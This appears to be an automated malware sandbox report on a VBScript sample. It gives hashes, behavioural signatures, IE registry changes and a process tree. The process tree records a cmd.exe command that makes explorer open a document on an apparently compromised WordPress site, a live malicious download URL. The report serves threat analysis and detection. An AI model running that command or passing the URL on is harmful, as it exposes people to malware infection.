Analysis
-
max time kernel
118s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21-04-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
Resource
win10v2004-20240412-en
General
-
Target
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs
-
Size
27KB
-
MD5
75ec9f68a5b62705c115db5119a78134
-
SHA1
6209f948992fd18d4fc6fc6f89d9815369ac8931
-
SHA256
ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
-
SHA512
82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
-
SSDEEP
384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
Processes:
WScript.exeflow pid process 15 2512 WScript.exe 16 2512 WScript.exe 17 2512 WScript.exe 18 2512 WScript.exe 19 2512 WScript.exe 26 2512 WScript.exe 27 2512 WScript.exe 28 2512 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002dcc56832ee45b40af0f973e997a3e3e0000000002000000000010660000000100002000000022092da669b919b924418a4c175f95b113043879f49dbe1eb54697bd7706fb50000000000e8000000002000020000000ced0cced1f78a65edb5e6495c6af7ccc63cb0a642ad9c630126ce8c016da4a8f20000000f66a87a6d7cc664eae062b3d6443b52ac3364d59013e197737357af69755e732400000004e1d1371bc492c750e3257cce16bfa89f445be73525738aa6ddc15b71b4d82e1068d2625af849d7bf53a617eaf7c8cd9fc5794f10f16afd21be7c776df8a0cfb iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002dcc56832ee45b40af0f973e997a3e3e0000000002000000000010660000000100002000000058622e7c3719d8b683c39759d6e5f6305942f04e8e966a22f22ec6325aa26a3c000000000e80000000020000200000002cc8b961a89119987eb18464aa552b8e3ea171991144e50a97f9c4312ced21cf90000000504ab2fd837e8fbaf0ffafc1ef3888ba34e249f4064bc680619947c115c53b640eafd9cae674bc7772f5740c3fef83c1f83c4b306e02adaadf31db0335bc782e2a1e2dffed0f58e1a496a1d991bd2163c6939e7dcd3d24fe4d678d7880616a30cceac121f106f25239346813d3f5ea4f642686d20a4e63a2b28c7ef83e592909715adaf98aa9374a7bea4cdc15dd56d440000000e5239d81c7cb546b2fd1cc2fea42bbee4a2f548f4128b3f6142b29b1fe06e92b2af53efffba68722865b03df98220d6653621d3391b02c3e66be1deecc59437a iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "419824311" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D77EF01-FF7D-11EE-87C3-6E6327E9C5D7} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10828c328a93da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2580 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2580 iexplore.exe 2580 iexplore.exe 2540 IEXPLORE.EXE 2540 IEXPLORE.EXE 2540 IEXPLORE.EXE 2540 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.execmd.exeexplorer.exeiexplore.exedescription pid process target process PID 2512 wrote to memory of 2220 2512 WScript.exe cmd.exe PID 2512 wrote to memory of 2220 2512 WScript.exe cmd.exe PID 2512 wrote to memory of 2220 2512 WScript.exe cmd.exe PID 2220 wrote to memory of 2612 2220 cmd.exe explorer.exe PID 2220 wrote to memory of 2612 2220 cmd.exe explorer.exe PID 2220 wrote to memory of 2612 2220 cmd.exe explorer.exe PID 2144 wrote to memory of 2580 2144 explorer.exe iexplore.exe PID 2144 wrote to memory of 2580 2144 explorer.exe iexplore.exe PID 2144 wrote to memory of 2580 2144 explorer.exe iexplore.exe PID 2580 wrote to memory of 2540 2580 iexplore.exe IEXPLORE.EXE PID 2580 wrote to memory of 2540 2580 iexplore.exe IEXPLORE.EXE PID 2580 wrote to memory of 2540 2580 iexplore.exe IEXPLORE.EXE PID 2580 wrote to memory of 2540 2580 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2580 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD51c31090b50819c568ad318f1cef794d6
SHA1e6139361b246e05d230be28d1249bff5ecdd1cf6
SHA25628bb283a0d1fb89a9638850c69651b5bdf71acf7e8c1afcdf1b8b98f6a88e9d3
SHA512360b9c3bc149b02d5d2d121163293fd3df81af097ae9b111272fb65334072656e3c6403c6bd8de2b5a98e1e52ed24b4b18fdc3a0f699a9254002c950f0fc976d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD56d1d8d9a72b849dc6f757b2dc1ffef89
SHA14fbdc13917c7bdbd3cf97a65c044fbfd4beca9ce
SHA2562c4a593102efbcce76f67bbc92d7b52c0949e61b53aa92685f9cba591258bb54
SHA512468b6b0a60248bbf783caa3a7825b400fd490f9f47f4885054ffda61daf22cd362ad76eb30591129b58d0ba7e6fa4bd2225d8c3243fc0dd5d1e2214fc74aec74
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD53504e5b8f81f202c0c59b13facbb7397
SHA1a7ebb8d5f9da764dcb52bfabf210c02f0a32429a
SHA256a7099318befe7d0d6490caff72e56da9458c77b8fa7105fa5b588b8da45a3b70
SHA51234c3afda33fa23daf26ec719337131dafe390d46174bf8c1bcb0823369be5630cd17cff9550076798387758be7cf7e17b7bee1042d76a825de4180dfb30c4bd8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD57b82bd558674edd1c9133eddd6b2931d
SHA14e80b614b84d4b23955fa992983cbb3fa9d5bd55
SHA256178330a0219dae40f6e5ba5f801aa7a4585123bf510e165cba13750f345c0891
SHA512d0ab63829d1c34fa0111b8d56d0b3032134fc0ce55412327dc9332d6cb9ba5d3361de45a907f130fd4515c8ebdd88c98c821bb3224ac22c8c69e56739d1f0c40
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD517f239643b2cb1ccbcefc5b6f5673ed6
SHA111b11aae2beff0aad4e6ccf8a63951a79bb669aa
SHA25634d8ba64f5f22fbdd588145f5887ca6b2e4ff0b568ed5b5f72c350bd57aa0a28
SHA512c3e65413c36bedc3d515eb9484291548013c1af213e955d9a390a4fe60f7fd4e1708c259d8d935b5147e75f1799786af2a0b148789025e1ef69c03eef730938a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5a7fae553f8e8d8e8e279d17651a30fd8
SHA15f6df1f3d7d2c1842afd379bf0b7b517653b5db2
SHA2564b4ececbab387b8580fcf446047ba6171179dd4e55804d722bf778125710973e
SHA512b7391d5ee462fe2120e1564c6715951623dc71a2382bf17f58dd31f19d546b3d09e2eb615b2ead0b305422f425605874f7bcd84b1b734d6623d7392e505f4af4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD51e7864a6d5a27aead6797229404f9827
SHA17822b72097642fe4eb1d56700a8ddd8fd336f77b
SHA256037bad180a48a110a19d5ccfcf304391b02b37b7a600916db365a4ac22ffc88b
SHA512b6018fc75b25805112d1820fca83cc6f9fc1db975c5325139fa6aa42c77f8f82ba0b5ff7fc7b476e092022d969cc6cdd42059ed659d39d6f6c6f91bdecaaf939
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD541b7ccee445d26c849f08b669f5ca290
SHA10725665fca956ce826962dea7b77d0822ff4d883
SHA256bb28dee398a9330464d880f3dadd642f8b903fa9fd06ac1409d716c040f93049
SHA512d4986152120985d685c43140ef70b2e390993bfa72dce6b8d2753bc0c5b38cee6e0ad822b6b01398ff1de0794642b3ae4bc9a5c2905448eac6d5a946868ce06c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD579dba776f5cb159aca7bd8a01c30585f
SHA1b679e1d79421f64f43ad989293bf9705e8762046
SHA25619eeea64dbf0fc54c3de8b9f48c3cb29bd108fdc592476f07688da5258625676
SHA51297978622ff771df8cd8776d1b0f1bd751588485c48deacc1e3e366a6bfb38a684812664beb044dadb16597a6754ed41f9d4bc89a292c63e37eb64315af4382dc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD537bc0736aee7402655bc0b2b77a80244
SHA156f6e83cba0da939c4caa4acbb63e4ee1d4f8d61
SHA256714a658db5c82d7897da90e354431156c324e82420ffab2478cc68e4ababb58b
SHA512674c77e717d27a85bc86687bef396924cd08513d7ff1e9d79e1d0b185bc1ddbdea65483bd904ee91978421120d8fb165fc7e31f4901c709f61e2d201eb3d1c27
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD502c0c436f9ab4d0d10e94f6f66a9f95c
SHA11f0410f920a922e8f9701b51e236f6b5cff748a4
SHA256789c1b1cb4acd8caeca5f793ea8b2f8bf3f6d759551fedfea2d352398d19f74f
SHA512ac79902c9c3a86c06d8f06d1073b32937a130deba211f912248031066a54d6575423f559fbc7d8350c548d65c0dda84fca4eee76a2968ddef1f18ea093faa8d3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD581f63ca81cb296d0cf319098b932e145
SHA1ea6fa7ace0498809fd8f576053d34c89b81782b9
SHA2565cebf15c0994a034e55899da1bbf382c2ed9d18de9038704205be32630de8bd4
SHA512d50ae0f1dc518c11e9e685dc981dcb0d597316c8009d70b903da42414715da888125f5e62640469de294c5980aed81a7f6fba0819fc8131ae1450b647de31270
-
C:\Users\Admin\AppData\Local\Temp\Cab4CAC.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Tar5960.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a